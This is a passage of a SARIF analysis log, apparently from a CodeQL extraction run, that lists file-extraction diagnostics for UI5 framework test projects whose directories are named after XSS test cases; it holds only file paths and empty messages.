ormattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/index.js","uriBaseId":"%SRCROOT%","index":428}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":429}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":430}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package-lock.json","uriBaseId":"%SRCROOT%","index":431}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/package.json","uriBaseId":"%SRCROOT%","index":432}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/ui5.yaml","uriBaseId":"%SRCROOT%","index":433}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":434}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":435}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.html","uriBaseId":"%SRCROOT%","index":436}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/index.js","uriBaseId":"%SRCROOT%","index":437}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":438}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":439}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package-lock.json","uriBaseId":"%SRCROOT%","index":440}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/ui5.yaml","uriBaseId":"%SRCROOT%","index":441}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":442}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":443}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/package.json","uriBaseId":"%SRCROOT%","index":444}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.html","uriBaseId":"%SRCROOT%","index":445}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/index.js","uriBaseId":"%SRCROOT%","index":446}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":447}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":448}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":449}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json","uriBaseId":"%SRCROOT%","index":450}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":451}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":452}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":453}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":454}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":455}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":456}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":457}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":458}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json","uriBaseId":"%SRCROOT%","index":459}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":460}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":461}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":462}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":463}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":464}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":465}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":466}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json","uriBaseId":"%SRCROOT%","index":467}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json","uriBaseId":"%SRCROOT%","index":468}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml","uriBaseId":"%SRCROOT%","index":469}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":470}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html","uriBaseId":"%SRCROOT%","index":471}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js","uriBaseId":"%SRCROOT%","index":472}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":473}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":474}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/package-lock.json","uriBaseId":"%SRCROOT%","index":475}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/package.json","uriBaseId":"%SRCROOT%","index":476}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/ui5.yaml","uriBaseId":"%SRCROOT%","index":477}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/Component.js","uriBaseId":"%SRCROOT%","index":478}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App3.controller.js","uriBaseId":"%SRCROOT%","index":481}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App4.controller.js","uriBaseId":"%SRCROOT%","index":482}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":483}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/index.html","uriBaseId":"%SRCROOT%","index":484}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/index.js","uriBaseId":"%SRCROOT%","index":485}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":486}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/App1.view.xml","uriBaseId":"%SRCROOT%","index":487}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/App2.view.xml","uriBaseId":"%SRCROOT%","index":488}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/App3.view.xml","uriBaseId":"%SRCROOT%","index":489}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/App4.view.xml","uriBaseId":"%SRCROOT%","index":490}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":491}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json","uriBaseId":"%SRCROOT%","index":492}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json","uriBaseId":"%SRCROOT%","index":493}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml","uriBaseId":"%SRCROOT%","index":494}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":495}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html","uriBaseId":"%SRCROOT%","index":496}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js","uriBaseId":"%SRCROOT%","index":497}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":498}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":499}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json","uriBaseId":"%SRCROOT%","index":500}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json","uriBaseId":"%SRCROOT%","index":501}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml","uriBaseId":"%SRCROOT%","index":502}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":503}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html","uriBaseId":"%SRCROOT%","index":504}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":505}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":506}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json","uriBaseId":"%SRCROOT%","index":508}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json","uriBaseId":"%SRCROOT%","index":509}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml","uriB